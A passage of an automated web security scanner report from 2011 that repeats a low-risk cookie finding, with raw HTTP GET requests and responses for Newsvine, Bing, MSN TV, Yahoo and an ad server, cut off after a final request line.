HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:50:56 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA56 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=f2b9f9c8edf64a949f8339bbfbc006f6; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=8F837BE9C6D04544883F495E86A13FAC; domain=.redacted; expires=Wed, 17-Aug-2011 23:50:56 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 25485
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-gb" lang="en-gb" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: suzanne-choney.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 02:19:28 GMT Server: Apache/2.2.9 (Debian) Vary: negotiate,Accept-Encoding TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=6046a552d588b2b1ca9c2098d0a526d4; expires=Sat, 25-Jan-2031 02:19:28 GMT; path=/; domain=.newsvine.com Pragma: no-cache Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 79989
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: technolog2.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 02:53:12 GMT Server: Apache/2.2.14 (Debian) Vary: negotiate TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=4d47ba7c4a967234cfe2368b17e3e89b; expires=Sat, 25-Jan-2031 02:53:12 GMT; path=/; domain=.newsvine.com Pragma: no-cache Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 83448
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXe8gB1ttrVL1UTNow8-ycNk5nkmECiF81g==/click.txt HTTP/1.1 Host: this.content.served.by.adshuffle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=7b2fbc92-cfda-4d32-8a9d-0293b3f8c07b; v=576462396875340721; ts=1/29/2011+12:42:58+AM; av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.61f6d=0129111929; vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:61F6D_0_0_0_20BC31_0_0; vc=; z=4; NSC_betivggmf-opef=ffffffff0908153745525d5f4f58455e445a4a423660;
Response
HTTP/1.1 302 Found Cache-Control: private, no-cache="Set-Cookie" Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: Sun, 30 Jan 2011 01:51:08 GMT Location: http://search.mylife.com/wp-people/?s_cid=DIS70b79249d87148edb59e29f186dfc0b753aa0a7422bf4444a8f1fff785ffedf1 Server: Microsoft-IIS/7.0 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Set-Cookie: ac1=51f37.61f6d=0129111951; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/ Set-Cookie: av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.61f6d=0129111929; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/ Set-Cookie: vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:61F6D_0_0_0_20BC31_0_0|c51F37:61F6D_0_0_0_20BC47_0_0; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/ Date: Sun, 30 Jan 2011 01:51:08 GMT Content-Length: 226 Set-Cookie: NSC_betivggmf-opef=ffffffff0908153745525d5f4f58455e445a4a423660;expires=Sun, 30-Jan-2011 01:56:08 GMT;path=/
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://search.mylife.com/wp-people/?s_cid=DIS70b79249d87148edb59e29f186dfc0b753aa0a7422bf4444a8f1fff785ffedf1">here</ ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXe8gB1ttrVL1UTNow8-ycNk5nkmECiF81g==/view.pxl HTTP/1.1 Host: this.content.served.by.adshuffle.com Proxy-Connection: keep-alive Referer: http://msn.whitepages.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v=576462396875340721; ts=1/29/2011+12:42:58+AM; z=4; sid=43118469-708a-43ea-a596-af6467b86b10; av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.693f3=0128111859; vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:693F3_0_0_0_20B673_0_0
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache="Set-Cookie" Pragma: no-cache Content-Type: text/html Expires: Sun, 30 Jan 2011 01:29:45 GMT Server: Microsoft-IIS/7.0 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Set-Cookie: sid=7b2fbc92-cfda-4d32-8a9d-0293b3f8c07b; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/ Set-Cookie: vc=; domain=by.adshuffle.com; expires=Tue, 01-Jan-1980 06:00:00 GMT; path=/ Set-Cookie: av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.61f6d=0129111929; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/ Set-Cookie: vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:61F6D_0_0_0_20BC31_0_0; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/ Date: Sun, 30 Jan 2011 01:29:44 GMT Content-Length: 43 Set-Cookie: NSC_betivggmf-opef=ffffffff0908153745525d5f4f58455e445a4a423660;expires=Sun, 30-Jan-2011 01:34:45 GMT;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: toddkenreck.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 02:57:39 GMT Server: Apache/2.2.14 (Debian) Vary: negotiate TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=c66a118e1fcbecd5b536a96e40929013; expires=Sat, 25-Jan-2031 02:57:39 GMT; path=/; domain=.newsvine.com Pragma: no-cache Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 66367
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: top.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 03:00:36 GMT Server: Apache/2.2.14 (Debian) Vary: negotiate,Host TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=91e5bf02a7007c2a6827929e99162d52; expires=Sat, 25-Jan-2031 03:00:36 GMT; path=/; domain=.newsvine.com Pragma: no-cache Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 44669
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /users HTTP/1.1 Host: top.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 02:58:16 GMT Server: Apache/2.2.14 (Debian) Vary: negotiate,Host TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=a08b4d7ef3970ad6780f87b910dbac7c; expires=Sat, 25-Jan-2031 02:58:16 GMT; path=/; domain=.newsvine.com Pragma: no-cache Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 25806
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: tv.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 69709 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: stad=; path=/ Set-Cookie: MC1=V=3&GUID=dfa3666ab2b24263815b585d8424c2c2; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/ X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:51:39 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head><title> MSN TV: Ho ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /tv/article.aspx?news=625552>1=28103 HTTP/1.1 Host: tv.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 54757 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: stad=; path=/ Set-Cookie: MC1=V=3&GUID=62ae4f15c8c0486a828bffcaa09140f2; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/ X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:51:40 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head><title> Source: Sh ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mc/compose HTTP/1.1 Host: us.mc1125.mail.yahoo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sun, 30 Jan 2011 01:22:08 GMT Set-Cookie: B=eb61ua56k9fa0&b=3&s=19; expires=Tue, 29-Jan-2013 20:00:00 GMT; path=/; domain=.yahoo.com P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Location: http://login.yahoo.com?.src=ym&.done=http%3A%2F%2Fus.mc1125.mail.yahoo.com%2Fmc%2Fcompose Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Cache-Control: private Age: 0 Connection: close Via: HTTP/1.1 r17.ycpi.ac4.yahoo.net (YahooTrafficServer/1.19.5 [cMsSf ]) Server: YTS/1.19.5
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /CNT/iview/299297287/direct;pc.106028736;wi.300;hi.120/01?click= HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Referer: http://www.redacted/ Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: redcated Proxy-Connection: Keep-Alive Cookie: MUID=AD04D6F8B2FF44629973BD0674351135
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 261 Content-Type: text/html Expires: 0 P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC" Set-Cookie: AA002=001296343597-3954973; expires=Monday, 28-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Connection: close Date: Sat, 29 Jan 2011 23:26:37 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: wbenedetti.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 03:05:09 GMT Server: Apache/2.2.14 (Debian) Vary: negotiate TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=37e0e82eb5225aaf39e58b2c59ea3714; expires=Sat, 25-Jan-2031 03:05:09 GMT; path=/; domain=.newsvine.com Pragma: no-cache Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 80810
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
Response
HTTP/1.1 200 OK Cache-Control: private, max-age=0 Content-Length: 28803 Content-Type: text/html; charset=utf-8 P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml" X-UA-Compatible: IE=7 Date: Sat, 29 Jan 2011 23:52:03 GMT Connection: close Set-Cookie: _SS=SID=116E16B4881F4F76A93BF81949677C2F; domain=.bing.com; path=/ Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:52:03 GMT; domain=.bing.com; path=/ Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ca7a8f284da884884a06f8cb36768c20c; expires=Mon, 28-Jan-2013 23:52:03 GMT; domain=.bing.com; path=/ Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/ Set-Cookie: SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:03 GMT; domain=.bing.com; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"><head><meta ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /events/search HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 116 Content-Type: text/html; charset=utf-8 P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml" Date: Sat, 29 Jan 2011 23:53:30 GMT Connection: close Set-Cookie: _SS=SID=712D1F94FAED4E98B6E572C9C51BBEF4; domain=.bing.com; path=/ Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/ Set-Cookie: SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:30 GMT; domain=.bing.com; path=/
Ref A: B2575C613A604708B56E80B00C179519 Ref B: F3576EA2ACED896FAE6E8179524B8516 Ref C: Sat Jan 29 15:53:30 2011 PST
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /finance/stockscreener HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 128153 Content-Type: text/html; charset=utf-8 P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml" X-UA-Compatible: IE=7 Date: Sun, 30 Jan 2011 01:52:17 GMT Connection: close Set-Cookie: _SS=SID=965375748DDD4D8188E499C867CEF5C8; domain=.bing.com; path=/ Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 01:52:17 GMT; domain=.bing.com; path=/ Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c03e263debce44bb8933c4855c834e0ea; expires=Tue, 29-Jan-2013 01:52:17 GMT; domain=.bing.com; path=/ Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/ Set-Cookie: SRCHD=MS=1620112&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 01:52:17 GMT; domain=.bing.com; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /images/results.aspx HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 62450 Content-Type: text/html; charset=utf-8 P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml" X-UA-Compatible: IE=7 Date: Sat, 29 Jan 2011 23:52:13 GMT Connection: close Set-Cookie: IMGSCHUSR=scratchpad=0&details=1&BE=1; expires=Mon, 28-Jan-2013 23:52:13 GMT; domain=.bing.com; path=/images Set-Cookie: _SS=SID=284EF21770EF4BD0AA7FB9D61CA8CF78; domain=.bing.com; path=/ Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:52:13 GMT; domain=.bing.com; path=/ Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce493bb2b667d42a4bbbffd58ff8085dc; expires=Mon, 28-Jan-2013 23:52:13 GMT; domain=.bing.com; path=/ Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/ Set-Cookie: SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:13 GMT; domain=.bing.com; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"><head><meta ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /local/ypdefault.aspx HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /maps/ HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /maps/default.aspx HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /maps/explore/ HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /msnhomepagehistory.aspx HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 116 Content-Type: text/html; charset=utf-8 P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml" Date: Sat, 29 Jan 2011 23:53:31 GMT Connection: close Set-Cookie: _SS=SID=B16082EC97414E74BEA1ECA2227B02CA; domain=.bing.com; path=/ Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/ Set-Cookie: SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:31 GMT; domain=.bing.com; path=/
Ref A: 91E11ED41EDC42D491A070AAB3F6B959 Ref B: 2975312DDC5A4D916D738818AD098869 Ref C: Sat Jan 29 15:53:31 2011 PST
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /news/results.aspx HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
Response
HTTP/1.1 302 Moved Temporarily Cache-Control: private Content-Length: 0 Location: /news P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml" Date: Sun, 30 Jan 2011 17:02:39 GMT Connection: close Set-Cookie: _HOP=I=1&TS=1296406958; domain=.bing.com; path=/ Set-Cookie: _SS=SID=555066E581BE46E4AA183A542A326C4A; domain=.bing.com; path=/ Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/ Set-Cookie: SRCHD=MS=1621022&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:02:38 GMT; domain=.bing.com; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
